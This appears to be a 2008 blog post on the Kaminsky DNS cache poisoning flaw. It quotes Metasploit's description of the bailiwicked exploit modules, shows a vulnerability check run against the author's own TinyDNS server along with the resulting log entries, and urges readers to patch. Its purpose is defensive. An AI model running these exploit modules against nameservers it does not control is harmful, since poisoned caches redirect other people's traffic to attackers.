As some of you may have heard there is a new DNS cache poisoning 'sploit in the wild
). Currently there are two exploits available, one for a domain and the other for a hostname. Check out the info on each here
. The basic idea is described in the files.
This exploit targets a fairly ubiquitous flaw in DNS implementations
which allow the insertion of malicious DNS records into the cache of the
target nameserver. This exploit caches a single malicious host entry
into the target nameserver. By causing the target nameserver to query
for random hostnames at the target domain, the attacker can spoof a
response to the target server including an answer for the query, an
authority server record, and an additional record for that server,
causing target nameserver to insert the additional record into the
(the latest from their SVN) includes each exploit. This makes it easy to test and attempt the exploit against your servers. Luckily my name servers are running TinyDNS
which does not have this flaw
. For example:
msf auxiliary(bailiwicked_host) > check
[*] Using the Metasploit service to verify exploitability...
[*] UNKNOWN: This server did not reply to our vulnerability check requests
You will see some requests in your DNS logs that look like this:
2008-07-25 14:26:45.896813500 3ff6167e:373a:0009 - 0010 spoofprobe-check-1-11391593674.red.metasploit.com
2008-07-25 14:26:55.899392500 3ff6167e:373a:000a - 0010 spoofprobe-check-2-1139140392.red.metasploit.com
2008-07-25 14:27:05.903259500 3ff6167e:373a:000b - 0010 spoofprobe-check-3-11391648643.red.metasploit.com
So yeah, if you aren't running TinyDNS patch your name servers!
More info at hackaday
and Dan Kaminsky's blog